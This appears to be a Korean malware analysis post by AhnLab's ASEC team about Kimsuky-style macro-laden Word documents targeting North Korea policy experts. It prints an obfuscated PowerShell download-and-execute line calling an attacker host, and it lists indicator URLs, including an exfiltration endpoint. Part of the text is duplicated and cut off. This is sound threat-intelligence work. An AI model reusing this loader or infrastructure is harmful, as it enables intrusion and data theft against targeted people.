대북 관련 특정인을 타겟으로 하는 악성 워드 문서
Contents
ASEC 분석팀은 안보 및 대북 관련 특정인을 타겟으로 하는 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다. 유포가 확인된 워드 문서의 파일명에는 대북 관련 인물의 이름이 포함된 경우가 다수 존재하여 해당 분야를 타겟으로 공격이 이루어지는 것으로 추정된다. 최근 확인된 워드 문서의 파일명은 다음과 같다.
|날짜||파일명|
|7/18||(작성양식)2022년 광복절 경축사 전문가 사전 의견수렴.doc|
|7/20||0511_통일부 *** 부장 회의록.doc|
|8/1||Asan Symposium 2022.doc|
|8/3||질문지(현** 연구위원님).doc|
|8/4||질문지(안** 총장님).doc|
|8/11||(기획)세션6. 경기도 “평화와 통일을 위한 사회적 대화” 추진방안.doc|
|8/16||질문지(정** 박사님).doc|
|8/17||한반도 안보와 대북전략 토론(김**).doc|
워드 문서에는 악성 VBA 매크로가 포함되어 있으며 해당 유형은 안랩 TIP에 공개된 <2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서> 에서 확인된 B 유형과 동일하다. 전체적인 동작 방식은 다음 그림과 같다.
가장 최근에 확인된 ‘한반도 안보와 대북전략 토론(김**).doc’ 에서 확인된 매크로 코드는 다음과 같다.
이전 ‘워드문서를 이용한 특정인 대상 APT 공격시도‘ 게시글에서 확인된 매크로 코드보다 조금 더 난독화되어 있다. 매크로 실행 시 파워쉘을 통해 ‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’ 에서 추가 스크립트를 다운로드한다.
|[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x|
해당 스크립트는 다음 명령어를 통해 사용자 PC 정보를 수집하여 %APPDATA%\Ahnalb\Ahnlab.hwp에 저장하며 해당 파일의 내용을 …
|날짜||파일명|
|7/18||(작성양식)2022년 광복절 경축사 전문가 사전 의견수렴.doc|
|7/20||0511_통일부 *** 부장 회의록.doc|
|8/1||Asan Symposium 2022.doc|
|8/3||질문지(현** 연구위원님).doc|
|8/4||질문지(안** 총장님).doc|
|8/11||(기획)세션6. 경기도 “평화와 통일을 위한 사회적 대화” 추진방안.doc|
|8/16||질문지(정** 박사님).doc|
|8/17||한반도 안보와 대북전략 토론(김**).doc|
워드 문서에는 악성 VBA 매크로가 포함되어 있으며 해당 유형은 안랩 TIP에 공개된 <2021년 Kimsuky 공격 워드(word) 문서 사례 총 정리 분석 보고서> 에서 확인된 B 유형과 동일하다. 전체적인 동작 방식은 다음 그림과 같다.
가장 최근에 확인된 ‘한반도 안보와 대북전략 토론(김**).doc’ 에서 확인된 매크로 코드는 다음과 같다.
이전 ‘워드문서를 이용한 특정인 대상 APT 공격시도‘ 게시글에서 확인된 매크로 코드보다 조금 더 난독화되어 있다. 매크로 실행 시 파워쉘을 통해 ‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’ 에서 추가 스크립트를 다운로드한다.
|[string]$f={(Nwraew-Objwraect Newrat.WebwraCliwraewrant).Doweilsdjfeng(‘hxxp://vjdif.mypressonline[.]com/ho/ng.txt’)};$j=$f.Replace(‘wra’,”);$u=$j.Replace(‘eilsdjfe’,’nloadstri’);$x=iex $u;iex $x|
해당 스크립트는 다음 명령어를 통해 사용자 PC 정보를 수집하여 %APPDATA%\Ahnalb\Ahnlab.hwp에 저장하며 해당 파일의 내용을 …
IoC
6f9c20f8f7f28a732b0853929a06b79c
http://vjdif.mypressonline.com/ho/ng.down
http://vjdif.mypressonline.com/ho/ng.txt
http://vjdif.mypressonline.com/ho/post.php
http://vjdif.mypressonline.com/ho/ng.down
http://vjdif.mypressonline.com/ho/ng.txt
http://vjdif.mypressonline.com/ho/post.php